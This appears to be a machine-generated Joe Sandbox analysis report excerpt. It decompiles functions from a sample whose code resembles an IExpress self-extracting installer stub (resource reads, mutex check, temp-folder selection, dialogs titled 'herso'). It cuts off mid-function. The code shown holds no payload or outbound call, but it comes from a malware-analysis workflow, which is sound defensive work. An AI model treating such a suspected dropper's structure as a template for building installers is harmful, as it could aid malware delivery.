                                                                                                                                                                                                          • EndDialog.USER32(?,00000000), ref: 0086343F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$herso
                                                                                                                                                                                                          • API String ID: 2418873061-1350055137
                                                                                                                                                                                                          • Opcode ID: ced26c7dd88deb8194233f698df0042207cf6222bcfa83666cc480a5c4080708
                                                                                                                                                                                                          • Instruction ID: eb8b91f313adf11f9b448b20306f0c01ef9c666bf0eb35d1a761b4c0a459bafa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ced26c7dd88deb8194233f698df0042207cf6222bcfa83666cc480a5c4080708
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0513730381240B7FB251B396C8DF7B795DFB56B45F134028F246E63C1CEE88A0196A6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                          			E00862CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t13;
                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                          				struct HRSRC__* _t31;
                                                                                                                                                                                                          				intOrPtr _t33;
                                                                                                                                                                                                          				void* _t43;
                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                          				signed int _t65;
                                                                                                                                                                                                          				struct HINSTANCE__* _t66;
                                                                                                                                                                                                          				signed int _t67;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t13 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                          				_t65 = 0;
                                                                                                                                                                                                          				_t66 = __ecx;
                                                                                                                                                                                                          				_t48 = __edx;
                                                                                                                                                                                                          				 *0x869a3c = __ecx;
                                                                                                                                                                                                          				memset(0x869140, 0, 0x8fc);
                                                                                                                                                                                                          				memset(0x868a20, 0, 0x32c);
                                                                                                                                                                                                          				memset(0x8688c0, 0, 0x104);
                                                                                                                                                                                                          				 *0x8693ec = 1;
                                                                                                                                                                                                          				_t20 = E0086468F("TITLE", 0x869154, 0x7f);
                                                                                                                                                                                                          				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                          					_t64 = 0x4b1;
                                                                                                                                                                                                          					goto L32;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                          					 *0x86858c = _t27;
                                                                                                                                                                                                          					SetEvent(_t27);
                                                                                                                                                                                                          					_t64 = 0x869a34;
                                                                                                                                                                                                          					if(E0086468F("EXTRACTOPT", 0x869a34, 4) != 0) {
                                                                                                                                                                                                          						if(( *0x869a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                          							L12:
                                                                                                                                                                                                          							 *0x869120 =  *0x869120 & _t65;
                                                                                                                                                                                                          							if(E00865C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                          								if( *0x868a3a == 0) {
                                                                                                                                                                                                          									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                          									if(_t31 != 0) {
                                                                                                                                                                                                          										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									if( *0x868184 != 0) {
                                                                                                                                                                                                          										__imp__#17();
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									if( *0x868a24 == 0) {
                                                                                                                                                                                                          										_t57 = _t65;
                                                                                                                                                                                                          										if(E008636EE(_t65) == 0) {
                                                                                                                                                                                                          											goto L33;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t33 =  *0x869a40; // 0x3
                                                                                                                                                                                                          											_t48 = 1;
                                                                                                                                                                                                          											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                          												if(( *0x869a34 & 0x00000100) == 0 || ( *0x868a38 & 0x00000001) != 0 || E008618A3(_t64, _t66) != 0) {
                                                                                                                                                                                                          													goto L30;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t64 = 0x7d6;
                                                                                                                                                                                                          													if(E00866517(_t57, 0x7d6, _t34, E008619E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                          														goto L33;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														goto L30;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												L30:
                                                                                                                                                                                                          												_t23 = _t48;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t23 = 1;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									E00862390(0x868a3a);
                                                                                                                                                                                                          									goto L33;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t64 = 0x520;
                                                                                                                                                                                                          								L32:
                                                                                                                                                                                                          								E008644B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                          								goto L33;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t64 =  &_v268;
                                                                                                                                                                                                          							if(E0086468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                          								goto L3;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                          								 *0x868588 = _t43;
                                                                                                                                                                                                          								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									if(( *0x869a34 & 0x00000080) == 0) {
                                                                                                                                                                                                          										_t64 = 0x524;
                                                                                                                                                                                                          										if(E008644B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                          											goto L12;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											goto L11;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t64 = 0x54b;
                                                                                                                                                                                                          										E008644B9(0, 0x54b, "herso", 0, 0x10, 0);
                                                                                                                                                                                                          										L11:
                                                                                                                                                                                                          										CloseHandle( *0x868588);
                                                                                                                                                                                                          										 *0x869124 = 0x800700b7;
                                                                                                                                                                                                          										goto L33;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						L3:
                                                                                                                                                                                                          						_t64 = 0x4b1;
                                                                                                                                                                                                          						E008644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                          						 *0x869124 = 0x80070714;
                                                                                                                                                                                                          						L33:
                                                                                                                                                                                                          						_t23 = 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                          			}




















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00862CD9
                                                                                                                                                                                                          • memset.MSVCRT ref: 00862CE9
                                                                                                                                                                                                          • memset.MSVCRT ref: 00862CF9
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646A0
                                                                                                                                                                                                            • Part of subcall function 0086468F: SizeofResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646A9
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646C3
                                                                                                                                                                                                            • Part of subcall function 0086468F: LoadResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646CC
                                                                                                                                                                                                            • Part of subcall function 0086468F: LockResource.KERNEL32(00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646D3
                                                                                                                                                                                                            • Part of subcall function 0086468F: memcpy_s.MSVCRT ref: 008646E5
                                                                                                                                                                                                            • Part of subcall function 0086468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008646EF
                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00862D34
                                                                                                                                                                                                          • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00862D40
                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00862DAE
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00862DBD
                                                                                                                                                                                                          • CloseHandle.KERNEL32(herso,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00862E0A
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                          • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$herso
                                                                                                                                                                                                          • API String ID: 1002816675-4197546956
                                                                                                                                                                                                          • Opcode ID: ae92c140c9e94043d804745d32a5662875ff925d0ebc503b33816c09dcc30fea
                                                                                                                                                                                                          • Instruction ID: 69e2d8836d28011eb6eb59eb5ab9133105790ba16fe455229e14f94dd791c9c1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae92c140c9e94043d804745d32a5662875ff925d0ebc503b33816c09dcc30fea
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4512670240B01AAEB24A7649C1AB3B369DFB51711F075075F986D62D2EFF98841CB23
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                                          			E008634F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                          				void* _t9;
                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                          				void* _t25;
                                                                                                                                                                                                          				struct HWND__* _t35;
                                                                                                                                                                                                          				struct HWND__* _t38;
                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t9 = _a8 - 0x10;
                                                                                                                                                                                                          				if(_t9 == 0) {
                                                                                                                                                                                                          					__eflags = 1;
                                                                                                                                                                                                          					L19:
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					 *0x8691d8 = 1;
                                                                                                                                                                                                          					L20:
                                                                                                                                                                                                          					_push(_a4);
                                                                                                                                                                                                          					L21:
                                                                                                                                                                                                          					EndDialog();
                                                                                                                                                                                                          					L22:
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                                          				_pop(1);
                                                                                                                                                                                                          				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                          				if(_t12 == 0) {
                                                                                                                                                                                                          					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                          					if(_a12 != 0x1b) {
                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L19;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t13 = _t12 - 0xe;
                                                                                                                                                                                                          				if(_t13 == 0) {
                                                                                                                                                                                                          					_t35 = _a4;
                                                                                                                                                                                                          					 *0x868584 = _t35;
                                                                                                                                                                                                          					E008643D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                          					__eflags =  *0x868184; // 0x1
                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                          						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                          						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					SetWindowTextA(_t35, "herso");
                                                                                                                                                                                                          					_t17 = CreateThread(0, 0, E00864FE0, 0, 0, 0x868798);
                                                                                                                                                                                                          					 *0x86879c = _t17;
                                                                                                                                                                                                          					__eflags = _t17;
                                                                                                                                                                                                          					if(_t17 != 0) {
                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						E008644B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                          						_push(0);
                                                                                                                                                                                                          						_push(_t35);
                                                                                                                                                                                                          						goto L21;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t23 = _t13 - 1;
                                                                                                                                                                                                          				if(_t23 == 0) {
                                                                                                                                                                                                          					__eflags = _a12 - 2;
                                                                                                                                                                                                          					if(_a12 != 2) {
                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					ResetEvent( *0x86858c);
                                                                                                                                                                                                          					_t38 =  *0x868584; // 0x0
                                                                                                                                                                                                          					_t25 = E008644B9(_t38, 0x4b2, 0x861140, 0, 0x20, 4);
                                                                                                                                                                                                          					__eflags = _t25 - 6;
                                                                                                                                                                                                          					if(_t25 == 6) {
                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                          						 *0x8691d8 = 1;
                                                                                                                                                                                                          						SetEvent( *0x86858c);
                                                                                                                                                                                                          						_t39 =  *0x86879c; // 0x0
                                                                                                                                                                                                          						E00863680(_t39);
                                                                                                                                                                                                          						_push(0);
                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags = _t25 - 1;
                                                                                                                                                                                                          					if(_t25 == 1) {
                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					SetEvent( *0x86858c);
                                                                                                                                                                                                          					goto L22;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t23 == 0xe90) {
                                                                                                                                                                                                          					TerminateThread( *0x86879c, 0);
                                                                                                                                                                                                          					EndDialog(_a4, _a12);
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}













                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000), ref: 00863535
                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 00863541
                                                                                                                                                                                                          • ResetEvent.KERNEL32 ref: 0086355F
                                                                                                                                                                                                          • SetEvent.KERNEL32(00861140,00000000,00000020,00000004), ref: 00863590
                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 008635C7
                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000083B), ref: 008635F1
                                                                                                                                                                                                          • SendMessageA.USER32(00000000), ref: 008635F8
                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000083B), ref: 00863610
                                                                                                                                                                                                          • SendMessageA.USER32(00000000), ref: 00863617
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,herso), ref: 00863623
                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 00863637
                                                                                                                                                                                                          • EndDialog.USER32(?,00000000), ref: 00863671
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                          • String ID: herso
                                                                                                                                                                                                          • API String ID: 2406144884-3992069730
                                                                                                                                                                                                          • Opcode ID: df693269b096d80a3b8bd838a778da1c21e41fddf954da649bd7d05b46df9dce
                                                                                                                                                                                                          • Instruction ID: 3efca264dda332f53276de00d840d7eb5ac7a675ea4d979d21fd54b3af8bd227
                                                                                                                                                                                                          • Opcode Fuzzy Hash: df693269b096d80a3b8bd838a778da1c21e41fddf954da649bd7d05b46df9dce
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B31A0B0240300BBDB241F25EC4DE2A3A69F796B01F136629F617E62A0CFB58A00DE55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                          			E00864224(char __ecx) {
                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                          				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                          				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                          				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                          				char* _v28;
                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                          				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                          				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                          				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                          				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                          				char _t42;
                                                                                                                                                                                                          				char* _t44;
                                                                                                                                                                                                          				char* _t61;
                                                                                                                                                                                                          				void* _t63;
                                                                                                                                                                                                          				char* _t65;
                                                                                                                                                                                                          				struct HINSTANCE__* _t66;
                                                                                                                                                                                                          				char _t67;
                                                                                                                                                                                                          				void* _t71;
                                                                                                                                                                                                          				char _t76;
                                                                                                                                                                                                          				intOrPtr _t85;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t67 = __ecx;
                                                                                                                                                                                                          				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                          				if(_t66 == 0) {
                                                                                                                                                                                                          					_t63 = 0x4c2;
                                                                                                                                                                                                          					L22:
                                                                                                                                                                                                          					E008644B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                          				_v12 = _t26;
                                                                                                                                                                                                          				if(_t26 == 0) {
                                                                                                                                                                                                          					L20:
                                                                                                                                                                                                          					FreeLibrary(_t66);
                                                                                                                                                                                                          					_t63 = 0x4c1;
                                                                                                                                                                                                          					goto L22;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                          				_v20 = _t28;
                                                                                                                                                                                                          				if(_t28 == 0) {
                                                                                                                                                                                                          					goto L20;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                          				_v16 = _t29;
                                                                                                                                                                                                          				if(_t29 == 0) {
                                                                                                                                                                                                          					goto L20;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t76 =  *0x8688c0; // 0x0
                                                                                                                                                                                                          				if(_t76 != 0) {
                                                                                                                                                                                                          					L10:
                                                                                                                                                                                                          					 *0x8687a0 = 0;
                                                                                                                                                                                                          					_v52 = _t67;
                                                                                                                                                                                                          					_v48 = 0;
                                                                                                                                                                                                          					_v44 = 0;
                                                                                                                                                                                                          					_v40 = 0x868598;
                                                                                                                                                                                                          					_v36 = 1;
                                                                                                                                                                                                          					_v32 = E00864200;
                                                                                                                                                                                                          					_v28 = 0x8688c0;
                                                                                                                                                                                                          					 *0x86a288( &_v52);
                                                                                                                                                                                                          					_t32 =  *_v12();
                                                                                                                                                                                                          					if(_t71 != _t71) {
                                                                                                                                                                                                          						asm("int 0x29");
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_v12 = _t32;
                                                                                                                                                                                                          					if(_t32 != 0) {
                                                                                                                                                                                                          						 *0x86a288(_t32, 0x8688c0);
                                                                                                                                                                                                          						 *_v16();
                                                                                                                                                                                                          						if(_t71 != _t71) {
                                                                                                                                                                                                          							asm("int 0x29");
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if( *0x8688c0 != 0) {
                                                                                                                                                                                                          							E00861680(0x8687a0, 0x104, 0x8688c0);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *0x86a288(_v12);
                                                                                                                                                                                                          						 *_v20();
                                                                                                                                                                                                          						if(_t71 != _t71) {
                                                                                                                                                                                                          							asm("int 0x29");
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					FreeLibrary(_t66);
                                                                                                                                                                                                          					_t85 =  *0x8687a0; // 0x0
                                                                                                                                                                                                          					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					GetTempPathA(0x104, 0x8688c0);
                                                                                                                                                                                                          					_t61 = 0x8688c0;
                                                                                                                                                                                                          					_t4 =  &(_t61[1]); // 0x8688c1
                                                                                                                                                                                                          					_t65 = _t4;
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						_t42 =  *_t61;
                                                                                                                                                                                                          						_t61 =  &(_t61[1]);
                                                                                                                                                                                                          					} while (_t42 != 0);
                                                                                                                                                                                                          					_t5 = _t61 - _t65 + 0x8688c0; // 0x10d1181
                                                                                                                                                                                                          					_t44 = CharPrevA(0x8688c0, _t5);
                                                                                                                                                                                                          					_v8 = _t44;
                                                                                                                                                                                                          					if( *_t44 == 0x5c &&  *(CharPrevA(0x8688c0, _t44)) != 0x3a) {
                                                                                                                                                                                                          						 *_v8 = 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}





























                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00864236
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0086424C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00864263
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0086427A
                                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,008688C0,?,00000001), ref: 0086429F
                                                                                                                                                                                                          • CharPrevA.USER32(008688C0,010D1181,?,00000001), ref: 008642C2
                                                                                                                                                                                                          • CharPrevA.USER32(008688C0,00000000,?,00000001), ref: 008642D6
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00864391
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 008643A5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                          • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                          • API String ID: 1865808269-1731843650
                                                                                                                                                                                                          • Opcode ID: 40ff0eab815e20acfe3bcaea07dc378ebfeacda7149f2ae75217bbc4e275fee5
                                                                                                                                                                                                          • Instruction ID: a9d99745daae66cb7c032c301ef749768f57d39942350bef7d9ca4bcf0445e8c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40ff0eab815e20acfe3bcaea07dc378ebfeacda7149f2ae75217bbc4e275fee5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B741E5B4A00204EFD711AFA4EC98A6E7BB4FB45344F172269EA45E7351CFB48C45CB62
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                          			E008644B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                                          				char _v576;
                                                                                                                                                                                                          				void* _v580;
                                                                                                                                                                                                          				struct HWND__* _v584;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t34;
                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                          				signed int _t39;
                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                          				signed int _t44;
                                                                                                                                                                                                          				signed int _t49;
                                                                                                                                                                                                          				signed int _t52;
                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                          				intOrPtr _t55;
                                                                                                                                                                                                          				intOrPtr _t58;
                                                                                                                                                                                                          				intOrPtr _t59;
                                                                                                                                                                                                          				int _t64;
                                                                                                                                                                                                          				void* _t66;
                                                                                                                                                                                                          				intOrPtr* _t67;
                                                                                                                                                                                                          				signed int _t69;
                                                                                                                                                                                                          				intOrPtr* _t73;
                                                                                                                                                                                                          				intOrPtr* _t76;
                                                                                                                                                                                                          				intOrPtr* _t77;
                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                                          				void* _t82;
                                                                                                                                                                                                          				intOrPtr* _t84;
                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                          				signed int _t89;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t75 = __edx;
                                                                                                                                                                                                          				_t34 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                          				_v584 = __ecx;
                                                                                                                                                                                                          				_t83 = "LoadString() Error.  Could not load string resource.";
